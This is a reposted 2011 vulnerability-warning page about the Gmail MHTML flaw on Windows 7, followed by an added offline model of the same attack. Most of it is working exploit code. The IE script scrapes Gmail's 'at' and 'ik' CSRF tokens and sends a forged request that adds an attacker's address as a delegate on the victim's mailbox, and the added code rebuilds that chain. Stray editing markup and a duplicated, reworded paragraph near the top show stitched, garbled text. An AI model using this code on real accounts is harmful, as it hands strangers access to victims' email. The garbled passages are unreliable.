Gmail MHTML vulnerability test code under Windows 7 - vulnerability warning - the black bar safety net

2011-05-10T00:00:00
ID MYHACK58:62201130405
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-05-10T00:00:00

Description

RAyh4c's black box: the blog has not been updated for a long time, so here is a repost of the Gmail MHTML vulnerability test code for Windows 7. The full version I wrote back then, I have no idea where it got thrown to - -!
</grreplace>
<gr_replace lines="13" cat="clarify" orig="The MHTML vulnerability in WINDOWS 7">
Using the MHTML vulnerability on Windows 7 to initiate the AJAX request is not like XP, where a direct http: request works: on Windows 7 the requested URL must also use the mhtml: protocol, otherwise there is no permission. Does the same-origin policy under Win7 look stricter than under XP? I don't know whether anyone has paid attention to this detail.

The MHTML vulnerability in WINDOWS 7 to initiate the AJAX request, does not like XP, direct request HTTP Protocol you can, the URL of the request must also be in the MHTML Protocol, otherwise there is no permissions WIN7 under the same-origin policy looks like than XP strict? Don't know someone to pay attention to the details of this no.

To test the CSRF against Gmail's relevant interface, the two parameters AT and IK must be obtained first, otherwise the request cannot succeed. There are many ways to obtain these two parameters: they can be taken from the cookies or directly from the page. The code below takes them directly from the page.

// Original test code, reflowed from the page's single line and with the regex
// characters that the page's rendering ate ("*", digits, "$1") restored.
// IE-only (ActiveX XMLHTTP); runs inside the script injected through mhtml:.
// Every request URL is wrapped in the mhtml: scheme, which Windows 7 requires.

var Tmail = "delegate@example.com"; // placeholder: Tmail is not defined on the page; set it to the address to add as a delegate

// Step 1: fetch the basic-HTML UI and pull the 34-character "at" token from a link.
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("GET", "mhtml:https://mail.google.com/mail/h/0/", true);
xmlHttp.onreadystatechange = function() {
    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
        var REX = /href=\".*?at=(.{34})\">/.exec(xmlHttp.responseText);
        var AThash = RegExp.$1;

        // Step 2: fetch the standard UI and pull the 10-character "ik" value from GLOBALS.
        xmlHttp.open("GET", "mhtml:https://mail.google.com/mail/", true);
        xmlHttp.onreadystatechange = function() {
            if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
                REX = /GLOBALS=\[.*?,"(.{10})",/.exec(xmlHttp.responseText);
                var IKhash = RegExp.$1;

                // Step 3: the forged request. view=mdlg with mdrp=1 adds Tmail as a
                // delegate on the victim's mailbox; ik and at satisfy Gmail's CSRF check.
                xmlHttp.open("POST", "mhtml:https://mail.google.com/mail/?ui=2" + "&ik=" + IKhash + "&view=mdlg&at=" + AThash, true);
                xmlHttp.onreadystatechange = null;
                xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                xmlHttp.send("mdrp=1&mda=%0D%0A" + Tmail + "%0D%0A");
            }
        };
        xmlHttp.send();
    }
};
xmlHttp.send();
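The token-harvesting chain above only runs inside IE with the mhtml: handler and a logged-in Gmail session. The following is an added example, not RAyh4c's code, that models the same chain offline: the two regexes from the test code are applied to constructed stand-ins for the 2011 Gmail pages (the sample HTML, the token values and the fake transport are all made up for the example), the request URLs are wrapped in mhtml: as the Windows 7 note requires, and the forged delegation request is assembled from the harvested values. The regexes and the request shape follow the original code; the delegate address is URL-encoded here, which the original did not do.

```javascript
// Added example, not code from the original post: an offline model of the
// token-harvesting chain the exploit runs through the mhtml: handler.

// Constructed stand-in for https://mail.google.com/mail/h/0/ (basic HTML UI).
const SAMPLE_AT = "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234567"; // 34 chars, made up
const SAMPLE_BASIC_HTML =
  '<html><body><a href="?&at=' + SAMPLE_AT + '">Sign out</a></body></html>';

// Constructed stand-in for https://mail.google.com/mail/ (standard UI).
const SAMPLE_IK = "1a2b3c4d5e"; // 10 chars, made up
const SAMPLE_MAIN_HTML =
  '<script>var GLOBALS=[0,"victim@example.com","' + SAMPLE_IK + '",8,"en"];</script>';

// Same regexes as the original test code: a 34-character "at" token taken
// from a link, and a 10-character "ik" value taken from the GLOBALS array.
function extractAtToken(html) {
  const m = /href=".*?at=(.{34})">/.exec(html);
  return m ? m[1] : null;
}

function extractIkToken(html) {
  const m = /GLOBALS=\[.*?,"(.{10})",/.exec(html);
  return m ? m[1] : null;
}

// On Windows 7 the request URL itself has to use the mhtml: scheme (the
// page's own observation); on XP a plain https: URL worked.
function toMhtmlUrl(url) {
  return "mhtml:" + url;
}

// The forged delegation request: view=mdlg with mdrp=1 adds delegateAddress
// as a delegate on the victim's mailbox; "ik" and "at" satisfy the CSRF check.
function buildDelegateRequest(ik, at, delegateAddress) {
  return {
    method: "POST",
    url: toMhtmlUrl("https://mail.google.com/mail/?ui=2&ik=" + ik + "&view=mdlg&at=" + at),
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: "mdrp=1&mda=%0D%0A" + encodeURIComponent(delegateAddress) + "%0D%0A",
  };
}

// Runs the whole chain against an injected transport so it can be exercised
// offline. fetchFn(method, url, body) returns the response text or null.
// Returns the delegation request, or null when either token is missing.
function harvestAndBuild(fetchFn, delegateAddress) {
  const basicPage = fetchFn("GET", toMhtmlUrl("https://mail.google.com/mail/h/0/"), null) || "";
  const at = extractAtToken(basicPage);
  if (!at) return null;
  const mainPage = fetchFn("GET", toMhtmlUrl("https://mail.google.com/mail/"), null) || "";
  const ik = extractIkToken(mainPage);
  if (!ik) return null;
  return buildDelegateRequest(ik, at, delegateAddress);
}

// Fake transport: maps the two mhtml: URLs to the constructed pages and
// refuses anything that is not wrapped in mhtml:, mirroring the Win7 rule.
function fakeGmail(method, url, body) {
  if (url === "mhtml:https://mail.google.com/mail/h/0/") return SAMPLE_BASIC_HTML;
  if (url === "mhtml:https://mail.google.com/mail/") return SAMPLE_MAIN_HTML;
  return null;
}
```

Replacing fakeGmail with a transport that returns the real pages would reproduce the original chain; the point of the fake one is that the extraction and request-building logic can be checked without a session.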